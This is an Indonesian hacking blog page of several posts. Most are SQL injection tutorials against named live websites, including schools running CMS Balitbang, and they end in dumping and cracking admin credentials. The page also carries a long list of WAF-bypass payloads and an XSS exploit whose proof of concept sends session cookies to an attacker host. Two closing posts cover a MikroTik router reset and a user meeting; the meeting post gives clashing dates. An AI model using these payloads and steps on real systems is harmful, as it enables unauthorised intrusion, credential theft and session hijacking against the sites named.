Kamis, 30 Juli 2015

Cara Menampilkan Nama Kita, Versi, Dan Database Pada SQLi Manual


Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual 
-  Baiklah :v kali ini saya mau membagikan Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual yups masih banyak yang belum tau bagaimana caranya :v langsung saja kita cari target :D

Oke setelah terinject dan muncul magic number contohnya seperti ini :

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,3,4,5--+

Seperti yang kita ketahui disitu muncul magic number angka 3 untuk menampilkan nama kita, kita bisa menggunakan concat 
Oke kita contohkan saya ingin menampilkan "Injected By Sec7or Team"

Query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(Injected By Sec7or Team),4,5--+

Tapi itu belum selesai yang harus kita lakukan selanjutnya adalah menkonvert 
"Injected By Sec7or Team" menggunakan hex bisa menggunakan tools yang udah kesebar di gugel atau bisa langsung menggunakan hackbar
download di sini
Pada hackbar ini ada otomatis konvert unhex buatan root-kajj jadi pada saat setekah konvert tidak perlu lagi menambah 0x pada depan hasil konvertan jadi query nya adalah

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d),4,5--+



Baiklah untuk menambah pemanis kita juga print versi dan database nya
query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d,version(),database()),4,5--+

Tampilan di atas masih acak acak kalian bisa menambahkan sendiri spasi atau mempermanis dengan menambah tag html :*

Tambahan :

user() : menampilkan user
version() : menampilkan versi
database() : menampilan database

Jika masih ada yang ingin ditanyakan silahkan tanyakan pada komentar :v
Happy suntik menyuntik ;v
Read more

Rabu, 29 Juli 2015

DIOS (dump in one shoot) Dengan Hackbar Modif

dios (dump in one shoot) dengan hackbar modif

halo sobat injector..
kali ini saya akan ngasih sedikit trik gimana injeksi sql dengan hackbar modif.
kenapa harus hackbar modif..kenapa tidak hackbar yg original saja...
kalo pertanyaan itu sempat terlintas di benak sobat injector, jawabanya simple karena kemampuan dan kelengkapan querynya.
di dalam hackbar yg original hanya tersedia query untuk basic sql saja..sedangkan dalam beberapa kasus ada beberapa website yang menggunakan  waf sebagai pengamanan website

untuk hackbar modif bisa di donlod di sini...download di sini
ok langsung aja menuju tekape..

sebagai percobaan kita gunakan live target http://mediabisnistelematika.co.id/viewevent.php?id_event=9

pertama kita test url dengan menambahkan tanda kutip (')



muncul eror atau sebagian artikel/gambar hilang,, berarti injeksi dapat kita lanjutkan.

lakukan perintah order by hingga menemukan kolom eror.

ternyata pada web ini eror terdapat pada kolom 7
selanjutnya gunakan perintah union select
angka ajaib yang muncul 3 dan 4

ok next.. jika selama ini kita hanya tau group_concat(table_name)  untuk dump daleman web, maka dengan hackbar modig ini kita tidak perlu repot2 untuk mengetik querynya..karena semua sudah tersedia,lengkap,praktis dan tentunya lebih rapi... kita hanya tinggal blok angka ajaibnya kemudian
klik union based dios mysql,dios by madblod...


dan wala............... semua sudah tersaji secara lengkap di depan anda...tanpa perlu repot memasukan querynya satu persatu.....

jika ingin melihat tampilan yg berbeda bisa gunakan dios yg lain..bisa di coba satu persatu... gmana sobat injector..cukup mudah bukan, ternyata sqli tidak serumit yang di bayangkan...


happy injecting...
Read more

Mengenal Lebih Dekat 'Senjata' Para Injector.


halo sobat injector.. kali ini saya akan membahas tools wajib para injector yaitu hackbar.
apa sih hackbar itu... hackbar adalah salah satu plugins/addons pada browser mozila.

bagi kaum injector..hackbar memang sudah tidak asing lagi..tapi bagi para pemula seperti saya mungkin masih butuh penyesuaian..apalagi jika selama ini kita adalah user havij atau sqlmap.
selama ini kita hanya mengenal hackbar yg secara umum cuma di gunakan untuk basic sql.

tapi kini para leet sql injector sudah memodifikasi hackbar sedemikian rupa sehingga lebih mudah di gunakan dan tentunya lebih powerfull,karena di lengkapi dengan DIOS(dump in one shoot) baik itu untuk mysql,mssql ataupun error based dios.

dan kerennya lagi hackbar modifan ini di lengkapi dengan query string yang di gunakan untuk membypass WAF..yangg kadang-kadang bikin kita pusing tujuh keliling.

berikut penampakan hackbar modifannya..



silahkan download di sini.. download di sini



happy injecting...

Read more

Bug XSS Di CMS Balitbang All Version


halo sobat injector.. kali ini akan kami bagi satu lagi bug di web berbasis cms balitbang... cekidot...:D

# Exploit Title:: bug XSS on CMS balitbang all version
# Date :: 2015-07-13
# Homepage:https ::divisidatalitbang.net
# Exploit Author:: Minato
# Dork :: site:sch.id atau bisa dikembangin lagi
==================
VULNERABLE CODE
==================
functions\fungsi_artikel.php:$kd=$_POST['kode'];
functions\agenda.php:$kode = $_GET['kode'];
functions\functions_download.php: $kode=$_GET['kode'];
functions\functions_mem.php:$kode=$_GET['kode'];
functions\fungsi_berita.php:$kd=$_GET['kode'];
dan bnyk lagy yg lainnya
# POC
http://www.sman11-smg.sch.id/html/index.php?id=artikel&kode=33'><script>alert(document.cookie)</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>alert(document.cookie)</script>
# XSS concept attacking ::GET PHPSESSID untuk menjadi admin
<script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>

nantikan trik trik sqli kami selanjutnya...:D
Read more

Selasa, 28 Juli 2015

MACAM MACAM BYPASS WAF

dalam dunia injector kita tidak asing lagi dengan istilah WAF.
apasih waf itu... waf adalah kepanjangan (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

jadi.....rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** )

untuk itu saya akan sedikit berbagi tentang jenis2 waf yg biasa di gunakan dalam dunia injector..:D

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]

/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

gmana...lumayan banyak kan... ga usah di hafal...ntar bikin botak...
karena sebagai sulusinya udah sya sertakan hackbar yg sudah include byapass wafnya.
bisa di donlod di sini hackbar modif

happy injecting...:D
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpu
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
Read more

SQL INJECTION ON CMS BALITBANG

sql injection on cms balitbang
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..

alat2 yang di butuhkan

-kompi (wajib hukumnya.. :D)
-koneksi internet
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
 download di sini

otomatis terdownload,kemudian klik allow..kemudian kilk installnow otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..

anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana

kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana

dan ternyata sebagian file hilang. berrarti bisa di pastikan web vuln sqli.
selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom  8


selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.




selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9

kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)



dannnn...wala...... muncul semua daleman webnya..;D


selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D

langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.

sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..

NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..


Read more

Senin, 27 Juli 2015

Cara Reset Routerboard MikroTik [Hardware]

Penulis Artikel : Ahmad Lukman Hakim
Berikut saya akan menulis artikel tentang cara mereset Routerboard MikroTik. Saya disini menggunakan series RB 700, seperti RB 711, 750, 751, dsb. Ini adalah cara mereset routerboard MikroTik secara HARDWARE. Saya yakin kalau cara mereset routerboard MikroTik secara SOFTWARE itu lebih mudah daripada secara HARDWARE dan caranya tidak sebarang menekan tombol reset saja, tetapi ada prosedur yang harus diperhatikan baik-baik. 

Berikut prosedur cara reset Routerboard MikroTik secara hardware:
1. Pastikan semua kabel UTP tidak ada yang terhubung ke port Ethernet.
2. Pastikan kabel Adaptor atau kabel Power tidak tercolok ke routerboard (harus router dalam keadaan off)
3. Ambil pena (atau alat lain yang kecil-lancip dan tidak mudah patah) yang bisa masuk ke lubang tombol reset routerboard.

4. Tekan tombol reset-nya sampai berbunyi 'tek' dan tahan (jangan dilepas) tetap kondisikan seperti tersebut lalu ambil kabel adaptor (power) dan colokan. Ini dilakukan dengan tetap menekan tombol resetnya
"Jika tombol reset terlepas pada saat proses mencolokan kabel adaptor (power) maka anda harus mengulangi prosedur no.4"
5. Tetap dalam kondisi tersesebut, tunggu sampai anda melihat lampu (LED) ACT menyala, tetap dalam kondisi tersebut sampai lampu ACT mati.
6. Masih dalam kondisi menekan tombol reset, tunggu lampu indikator port Ethernet menyala sebentar kemudian mati. Biasanya membutuhkan waktu 20-40 detik.
7. Setelah semua lampu indikator pada port Ethernet menyala kemudian padam. Lepaskan kabel adaptor (power), sehingga routerboard dalam keadaan off.
8. Colokan kembali kabel adaptor (power) untuk menghidupkan routerboard.
9. Routerboard sudah dalam keadaan default configuration. Anda bisa memulai konfigurasi dari awal.

Semoga dapat bermanfaat bagi pembaca yang belum tahu prosedur yang benar bagaimana itu me-reset routerboard MikroTik.


Read more

Minggu, 26 Juli 2015

Ikuti Mikrotik User Meeting Yogyakarta - Oktober 2015

Mikrotik User Meeting (MUM) akan kembali diselenggarakan di Indonesia. Setelah 2 tahun berturut-turut diselenggarakan di Yogyakarta, tahun 2015 ini juga akan diselenggarakan di tempat yang sama. Ada yang belum tau apa itu Mikrotik User Meeting (MUM)?


Apa itu Mikrotik User Meeting (MUM)?

Mikrotik User Meeting (MUM) adalah Sebuah konferensi dan pertemuan antar penggiat Mikrotik yang membahas tentang Software Mikrotik RouterOS dan, Hardware Mikrotik RouterBoard. Pada konferensi Mikrotik ini terdapat beberapa expert Mikrotik Indonesia dan Mancanegara yang berbagi informasi melalui presentasi tentang Mikrotik. Anda dapat mengajukan pertanyaan tentang topik tersebut. Ada juga Demo penggunaan teknologi terbaru Mikrotik, pengenalan produk baru, semua ada disini.
Selengkapnya tentang MUM bisa anda baca disini :
Apa itu Mikrotik User Meeting (MUM)?

MUM Indonesia tahun ini diselenggarakan di tempat yang sama, yakni di :
Royal Ambarrukmo, Jl. Adi Sucipto No. 81, Yogyakarta 55281

Acara ini akan dilaksanakan pada :
9 - 10 Oktober 2014


Penasaran dengan agenda Acara MUM tahun lalu?
Download Materi & Video MUM Indonesia - Yogyakarta 5-6 Desember 2014

Anda tertarik mengikuti event ini? Silakan daftar disini GRATIS.
mum.mikrotik.com/2015/ID/info



Setelah proses pendaftaran selesai, anda akan diberi tiket dalam bentuk .pdf seperti ini :



Silakan cetak dan potong tiket nya, lalu bawa pada saat hari pelaksanaan.

Oke, sampai jumpa di MUM Indonesia Yogyakarta 9 - 10 Oktober 2015.
Read more